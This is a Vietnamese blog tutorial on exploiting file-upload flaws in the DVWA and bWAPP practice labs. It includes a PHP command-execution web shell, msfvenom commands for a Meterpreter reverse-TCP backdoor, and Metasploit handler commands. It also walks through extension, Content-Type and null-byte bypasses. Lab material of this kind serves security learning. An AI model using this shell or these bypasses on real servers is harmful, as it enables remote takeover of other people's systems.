Hướng dẫn Vulnerability File Upload mức low

Code: <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION="&quo...










Code:

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>
</pre>
</BODY></HTML>


Lỗ hổng Upload File là một vấn đề lớn với các ứng dụng dựa trên web. Trong nhiều máy chủ web lỗ hổng này phụ thuộc hoàn toàn vào mục đích, cho phép kẻ tấn công để tải lên một tập tin với mã độc hại trong đó có thể được thực thi trên máy chủ. Một kẻ tấn công có thể có thể đặt một trang lừa đảo vào các trang web hoặc phá hoại các trang web.

[​IMG]

Dựa vào lỗ hổng kẻ tấn công có thể thu thập thông tin nội bộ của máy chủ web. Trong bài viết này chúng ta sẽ thảo luận các phương pháp khai thác lỗ hổng Upload File khác nhau và cố gắn khai thác được chúng. Bạn cũng sẽ học các kỹ thuật lây nhiểm khác nhau để tải lên một tập tin độc hại của php trong một máy chủ web và khai thác chúng. [h=3]CƠ BẢN UPLOAD[/h]
Trong kịch bản này một tập tin php đơn giản sẽ được đăng tải trên các máy chủ web mà không cần bất kỳ hạn chế, ở đây máy chủ không kiểm tra các loại tập tin hoặc trang nội dung phần mở rộng được tải lên.

Ví dụ, nếu máy chủ cho phép để tải lên một tập tin văn bản hoặc hình ảnh, được coi là dữ liệu và nếu tham số bảo mật là thấp trong khi đó không có hạn chế về loại nội dung hoặc tên tập tin sau đó bạn có thể dễ dàng bỏ qua tập tin php độc hại được coi là ứng dụng trong máy chủ web.

Click vào DVWA Secrity và thiết lập website Security Level thấp

Mở terminal trong kali linux và tạo php backdoor thông qua dòng lệnh sau
Mã:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=4444 -f raw
Sao chép và dán đoạn mã nhấn mạnh trong Leafpad và lưu lại với phần mở rộng PHP như img.php trên desktop.

Tải Metasploit framework gõ msfconsole và bắt đầu đa xử lý.
[​IMG]
Hãy trở lại với lab DVWA của bạn và nhấp vào tập tin tùy chọn tải lên từ trình đơn lỗ hổng.

Bây giờ bấm vào thẻ duyệt để duyệt tập tin img.php để tải nó về máy chủ web và click vào upload sẽ tải lên tập tin của bạn trên máy chủ web.
[​IMG]
Sau khi tải lên các tập tin PHP nó sẽ hiển thị đường dẫn của thư mục mà tập tin của bạn được tải lên thành công và bây giờ sao chép một phần được chọn và dán nó vào URL để thực hiện nó.

hackable/uploads/img.php
[​IMG]
Mã:
msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.104

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

meterpreter > sysinfo
Bạn có thể quan sát, tôi đã có Meterpreter session 1 của nạn nhân trên Metasploit.
[​IMG][h=3]SỬ DỤNG KỸ THUẬT GẤP ĐÔI PHẦN ĐUÔI TẬP TIN[/h]
Click vào DVWA Secrity và thiết lập Website Security Mức độ trung bình

Ở đây chúng tôi gặp một tình huống mà nó sẽ kiểm tra phần mở rộng tập tin. Ở mức độ bảo mật trung bình nó chỉ cho phép .jpeg và .png tập tin mở rộng để được đăng tải trên các máy chủ web và hạn chế các file khác với phần mở rộng tập tin duy nhất trong khi tải lên trong máy chủ web. Hiện nay có một số kỹ thuật mà qua đó chúng ta sẽ bỏ qua các tập tin PHP độc hại trong máy chủ web
[​IMG]
Đó là một cố gắng để che giấu bản chất thực sự của một tập tin bằng cách chèn nhiều phần mở rộng với tên tập tin mà tạo ra sự nhầm lẫn cho các thông số bảo mật. Ví dụ img1.php.png trông giống như png mà là một dữ liệu không phải là một ứng dụng nhưng khi tập tin được tải lên với phần mở rộng gấp đôi nó sẽ thực thi file php mà là một ứng dụng.

Lặp lại quá trình tương tự để tạo ra các backdoor php với msfvenom và bây giờ lưu các tập tin như img1.php.png trên desktop và chạy nền đa sử lý.

Kể từ khi tập tin này sẽ được tải lên ở mức độ bảo mật trung bình, do đó nó nó sẽ khác hơn so mới mức độ bảo mật thấp. Bởi vì điều này rõ ràng sẽ kiểm tra phần mở rộng của tập tin cũng như đọc tên tập tin.

Bắt đầu upload tập tin bằng cách nhấn vào nút duyệt tập tin và upload tập tin img1.php.png lên máy chủ web. Sử dụng burp suite để chặn bắt nó lại ở tab proxy.Đừng quên thiết lập proxy thủ công của trình duyệt của bạn và bấm vào tải lên.
[​IMG]
Tab Intercept sẽ làm việc để bắt request được gửi đi của phương thức post khi bạn nhấp vào nút để tải lên. Bây giờ thay đổi img1.php.png thành img1.php bên trong phần soạn thảo dữ liệu.
[​IMG]

So sánh sự thay đổi trước khi tải lên tập tin PHP của bạn. Sau khi thay đổi nhấp chọn forward để upload file PHP trong thư mục.
[​IMG]
Sau khi tải lên các tập tin PHP nó sẽ hiển thị đường dẫn của thư mục mà tập tin của bạn được tải lên thành công Bây giờ sao chép một phần được chọn và dán nó vào URL để thực hiện nó.

hackable/uploads/img1.php
[​IMG]
Điều này sẽ cung cấp một Meterpreter session 2 khi bạn chạy URL trong trình duyệt.

meterpreter > sysinfo
[​IMG][h=3]CONTENT TYPE FILE UPLOAD[/h]
Content-Type “thực thể trong header của các request chỉ ra loại phương tiện truyền thông nội bộ của nội dung tin nhắn. Đôi khi các ứng dụng web sử dụng tham số này để nhận ra một tập tin là hợp lệ. Ví dụ, họ chỉ chấp nhận các tập tin với “Content-Type” của “text / plain“. Có thể bỏ qua bảo vệ này bằng cách thay đổi thông số này trong tiêu đề yêu cầu sử dụng một proxy web.

Một lần nữa lặp lại quá trình tương tự để tạo backdoor php với msfvenom và bây giờ lưu các tập tin như img2.php trên desktop và chạy nền đa xử lý.
[​IMG]
Bắt đầu Burp Suite và lặp lại quá trình cho việc lấy các request đã gửi. Trong ảnh chụp màn hình, bạn có thể đọc các loại trang nội dung cho file php; bây giờ thay đổi này kiểu nội dung application/x-php thành image/png để upload file php của bạn.
[​IMG]
Từ hình ảnh dưới đây bạn có thể cảm nhận được thao tác trong “Content-Type“, mà được gọi là kỹ thuật tiêm Content-Type.
[​IMG]
Bây giờ sao chép một phần được chọn và dán nó trong URL để thực hiện nó.

hackable/uploads/img2.php
[​IMG]
Điều này sẽ cung cấp một Meterpreter session 3 khi bạn chạy URL trong trình duyệt.
Mã:
meterpreter > sysinfo
[​IMG][h=3]NULL BYTE INJECTION[/h]
Null Byte Injection là một kỹ thuật khai thác trong đó sử dụng các ký tự null byte URL-encoded (ví dụ: 00%, hoặc 0x00 trong hex) được người dùng cung cấp. Một null byte trong các URL được đại diện bởi ‘00%’, trong ASCII là một ” ” (khoản trống) trong quá trình lây nhiểm. Ở đây có thể làm thay đổi logic dự định của ứng dụng và cho phép kẻ thù nguy hiểm để có được quyền truy cập trái phép vào các tập tin hệ thống.

Bây giờ ở đây bạn sẽ thấy tôi đã chèn một chuỗi vào cuối phần mở rộng và thay đổi chuỗi đó vào giá trị hex của nó và sau đó thay thế giá trị hex từ null byte ‘00%’. Lý do đằng sau chèn một giá trị null byte là, một số ứng dụng ngôn ngữ kịch bản máy chủ vẫn sử dụng thư viện c/c ++ để kiểm tra tên tập tin và nội dung. Trong c/c ++ một dòng kết thúc bằng /00 được gọi là null byte.

Do đó khi trình biên dịch nghiên cứu một byte null ở cuối chuỗi, nó sẽ cho rằng nó đã đến vào cuối chuỗi và dừng lại đọc thêm của chuỗi.

Bây giờ tạo một backdoor php với msfvenom và bây giờ lưu các tập tin như img3.php.jpg trên desktop và chạy nền đa xử lý.
[​IMG]
Bắt đầu Burp Suite và lặp lại quá trình cho việc lấy các request đã gửi. Nó trông giống như tập tin mở rộng gấp đôi nhưng ở đây kỹ thuật này là khá khác nhau từ phần double extension file uploading.
[​IMG]
Thêm bất kỳ chuỗi ký tự hoặc chữ cái như trong ảnh chụp màn hình ở đây và bạn sẽ nhận thấy rằng sự thay đổi trong các dòng đánh dấu mà tôi đã thực hiện đổi img3.php.jpg thành img3.phpD.jpg, bây giờ làm theo các bước tiếp theo sẽ là sửa đổi chuỗi này thành null byte.
[​IMG]
Trong bước tiếp theo, chúng tôi sẽ giải mã chuỗi chèn vào; Bây giờ giải mã chuỗi hoặc bảng chữ cái của bạn như tôi đã cho ‘D’ Bây giờ giải mã nó thành hex mà sẽ cho giá trị hex của nó và từ ảnh chụp màn hình, bạn có thể đọc giá trị hex của nó là 44.
[​IMG]
Bây giờ bấm vào tùy chọn hex được chặn bên dưới để xem thông tin được hiển thị. Ở đây bạn có thể đọc các giá trị hex cho tên tập tin mà tôi đã làm nổi bật. Để khai thác null thay thế các giá trị hex 44 từ giá trị null byte 00.
[​IMG]

Bây giờ bạn có thể cảm nhận được sự thay đổi từ các ảnh chụp màn hình cho nơi tôi đã tiêm các giá trị null trong các vị trí của giá trị hex của chuỗi chèn vào của chúng tôi.
[​IMG]
Khi một lần nữa bạn sẽ xem các dữ liệu thô, Bây giờ đây bạn sẽ thấy rằng chuỗi ‘D’ được thay đổi thành giá trị null byte.
[​IMG]
Bây giờ chuyển tiếp các dữ liệu bị chặn để khai thác tập tin tải lên thông qua các kỹ thuật tiêm null byte. Tuyệt quá!!! Chúng tôi đã bỏ qua sự an toàn trung bình Bây giờ sao chép đường dẫn tải và dán nó trong URL để thực hiện nó.
[​IMG]
Như hình ảnh bên dưới chúng ta thấy Meterpreter session 4 trong Metasploit.
[​IMG][h=3]BLACKLISTING FILE EXTENSIONS[/h]
Mục tiêu tiếp theo là máy chủ Web khác: bwapp. Thiết lập mức độ bảo mật trung bình, từ hộp danh sách lựa chọn lỗi của bạn và chọn Unrestricted File Upload bây giờ và nhấp chuột vào Hack

Một số sever side scripting kiểm tra ngôn ngữ php trong tên tập tin hiện tại và cho phép chỉ những tập tin mà không có phần mở rộng .php. Ở đây chúng ta có thể tiêm tập tin của chúng tôi bằng cách thay đổi một số chữ cái với các hình thức vốn của mình để bỏ qua các quy tắc nhạy cảm trong trường hợp này, ví dụ PHP hay PHP3.
[​IMG]
Bây giờ tạo một backdoor php với msfvenom và bây giờ lưu các tập tin như img4.php3 trên desktop và chạy nền đa xử lý.

Sau đó duyệt qua img4.php3 để tải lên máy chủ web và click vào tab upload. Ở đây mức độ bảo mật là trung bình, nó sẽ cho phép tải lên tập tin php lên trên máy chủ web và từ ảnh chụp màn hình cho bạn có thể xem file php của tôi được tải lên thành công. Bây giờ hãy nhấp vào liên kết ở đây và bạn sẽ nhận được kết nối đảo ngược tại nền đa xử lý.
[​IMG]
Mã:
msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.104

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

meterpreter > sysinfo
Tuyệt quá!!! Bạn có thể thấy tôi đã có Meterpreter session 1.
[​IMG]
Nguồn : vnhackernews​









Mua-ngay-asun_28042016100144

Liên Hệ: Mr.Trường

Hotline0888 39 7576



COMMENTS

Tên

.:: Connect Trojan ::.,111,.htaccess,2,0-day,3,2017,2,Add-on,16,Affiliate,1,Anotador,1,AutoIT,17,BackDoor,1,Bán Sách,13,banhangonline,1,Bảo Mật,173,Bất Động Sản Tại Tiền Giang,5,Bestsellers,13,Binder,1,blog,31,Blogger,4,Blogger Template,1,Botnet,3,Brute,1,Bug Bounty,1,Bypass,10,camera,1,ceh,1,Châu Tinh Trì,2,Checked,6,Chrome,21,Code,5,coin hive,1,Coin-Hive,2,CoinHive,1,Connect Trojan,342,Connect Trojan ::.,1,Cổ Tích,2,Crack,3,Crypto,5,CSRF,5,CSS,2,Cuộc Sống,1,Dau tu,8,DDoS,6,Designer,1,Dich vụ,1,DNS,4,Download,2,du-an,3,DVD LUMION Tiếng Việt của anh Dũng Già Pro,1,Đam Mỹ,1,điện,1,Đồ Họa,215,Đô Thị,16,e11.me,1,ebook,17,ebook free,295,eBook Phệ Hồn Nghịch Thiên,1,eBook Thịnh Thế Địch Phi,1,Encrypt,1,Encryption,1,epub,76,epub [Tiên hiệp],1,ET-Logger,1,exploit,23,Exploitation,1,Extractor,2,facebook,69,FireFox,15,Flood,2,Forensic,7,full prc,2,game,177,Gerador,3,Gerenciador,1,Get Root,3,GHDB,3,Giả Tưởng,1,giaitri,1,Google,15,H&Y Shop,2,Hacker,3,Hacking,16,Hacking and Security,6,Hacking Tools,36,Hành Động,3,He Thong Site Phim,25,Hijacking,6,Hình Sự,1,hivecoin.hive coin,1,Hỏi Xoáy Đáp Xoay Trên VTV3,1,HTML,1,Huyền Ảo,92,Hướng dẫn Internet cơ bản,1,IFTTT,703,Imgur,2,Infographic,1,Information Disclosure,1,Internet Explorer,3,IT News,39,J2TeaM,29,J2TeaM Tools,9,JavaScript,6,Javascript Injection,3,Juno_okyo's Blog,23,Khóa Học,32,Khóa Học kiếm tiền online với accesstrade,5,khoá học miễn phí,16,Khóa học Photoshop,19,Khóa học sử dụng mã độc và phòng chống mã độc,2,Khoa Huyễn,6,khuyến mãi,16,kiemhiep,9,Kiếm Hiệp,20,Kiếm Tiền MMO,34,kiếm tiền rút gọn link,1,KilerRat,1,Kinh Dị,24,Kinh Dị - Ma,4,Kinh Doanh,73,kinhdi,1,kinhdoanh,5,KRACK Attacks,1,Lãng mạn,1,lazada,1,Lập trình,2,Lịch Sử,5,Linux,1,Local Attack,2,Logins/Cadastro,1,Lỗi Web,1,Lược Sử Hacker,2,Mã Giảm Giá,2,Mã Hóa,48,Malware,3,Master-Code,31,Máy Tính,1,Metasploit,2,Microsoft,4,mobile hacking,2,monero,1,Movie,25,MySQL,1,NEW PRODUCTS,19,NGHỆ THUẬT ẨN MÌNH,13,ngontinh,10,Ngôn Tình,151,nhà đất,1,Nhà Đất Gò Công,1,Nhân Vật Lịch Sử,2,Nhật Bản,1,Nhựt Trường Group,1,NjRat,5,Nước,1,open redirect,1,Oracle,1,Path Disclosure,2,pdf,76,Pen-Test,6,Pentest Box,9,Phan mem Internet,1,phanmem,23,phanmemdienthoai,3,phanmemmaytinh,10,phần mềm,11,Phim 18,2,Phim 2012,1,Phim 3D,1,Phim Âm Nhạc,2,Phim Bộ,39,Phim Chiến Tranh,5,Phim Dã Sử - Cổ Trang,6,Phim Đài Loan,6,Phim Đề Cử,4,Phim Hài Hước,26,Phim Hàn Quốc,33,Phim HD Chất Lượng Cao,5,Phim Hoạt Hình,2,Phim Hot,1,Phim Hồng Kông,20,Phim HQ,2,Phim Kinh Dị,8,Phim lẻ,4,Phim Mới 2011,2,Phim Mới 2012,1,Phim Mới 2015,1,Phim Nhật Bản,4,Phim SD,3,Phim Thái Lan,6,Phim Thần Thoại,4,Phim Tình Cảm,35,Phim Trung Quốc,37,Phim Truyền Hình,19,Phim Viễn Tưởng,1,Phim Võ Thuật,36,Phim Xã Hội Đen,1,Phishing,5,PHP,16,Plugin,1,Port,1,post mẫu,1,prc,77,Programming,15,Python,1,Quảng Cáo,1,rat,457,Recovery,3,Remote Code Execution,1,Remote Desktop,1,Reverse Engineering,6,review,3,rút gọn link,1,sach,47,Sách,37,Sách Nghệ Thuật Sống,12,sách nói,1,Sách Tâm Linh,1,Sách Tiếng Anh,2,sachiep,2,Sản Phẩm,1,Sắc Hiệp,16,Scam,1,Scanner,10,Security,66,SEO,5,share,1,Shell,5,shop,1,Social Engineering,4,Software,22,Source Unity,1,SQL injection,21,Sức Khỏe,1,Symlink,3,Tài Chính,1,Tài chính cá nhân,2,Tài Liệu,1,Tản mạn,7,Taudio,2,Tâm lý xã hội,1,tấn công,1,Testador,1,Thái Lan,2,Tham Khảo,3,thamkhao,11,them,1,Thiệp Cưới,1,Thiết Kế Web,30,Thời Trang,2,Thủ Thuật Hacking,53,Thuyết Minh,1,tienhiep,5,Tiên Hiệp,123,Tiểu Thuyết,94,tiki,3,TIL,8,Tin Tức,52,Tips,39,tool,1,Tool Hack,14,Tools,9,Tổng Hợp,1,Tricks,26,Trinh thám,1,trojan original,48,Trọng sinh,11,Trộm mộ,1,Trung Quốc,1,Truyện,1,Trương Định,110,Tu Chân,2,TUTORIALS,124,Twitter,1,Ung_Dung,4,Upload,1,usb,1,vanhoc,11,văn học,6,vBulletin,7,video,16,Vietsub,1,Việt Nam,4,Virus,4,Võ Thuật,3,Võng Du,5,Vulnerability,19,Web Developer,15,webmau,5,WHMCS,3,WiFi,2,wiki lỗi máy tinh,1,wiki lỗi NTG,3,Windows,12,WordPress,43,Write-up,11,XSS,16,Yahoo,1,yeah1offer,1,youtube,11,
ltr
item
NhutTruong.Com - Chia sẻ kiến thức miễn phí: Hướng dẫn Vulnerability File Upload mức low
Hướng dẫn Vulnerability File Upload mức low
https://2.bp.blogspot.com/-mJeFzI5t6vI/WtBnBO0b5DI/AAAAAAAAAPY/_-z-As0Z2oIPuV9A3eP7rnjB_lNcTQ29gCLcBGAs/s640/Nh%25E1%25BB%25B1t%2BTr%25C6%25B0%25E1%25BB%259Dng%2BGroup%2B2018-04-13_151615.jpg
https://2.bp.blogspot.com/-mJeFzI5t6vI/WtBnBO0b5DI/AAAAAAAAAPY/_-z-As0Z2oIPuV9A3eP7rnjB_lNcTQ29gCLcBGAs/s72-c/Nh%25E1%25BB%25B1t%2BTr%25C6%25B0%25E1%25BB%259Dng%2BGroup%2B2018-04-13_151615.jpg
NhutTruong.Com - Chia sẻ kiến thức miễn phí
https://www.nhuttruong.com/2018/04/huong-dan-vulnerability-file-upload-muc.html
https://www.nhuttruong.com/
https://www.nhuttruong.com/
https://www.nhuttruong.com/2018/04/huong-dan-vulnerability-file-upload-muc.html
true
7607280272436897486
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy Table of Content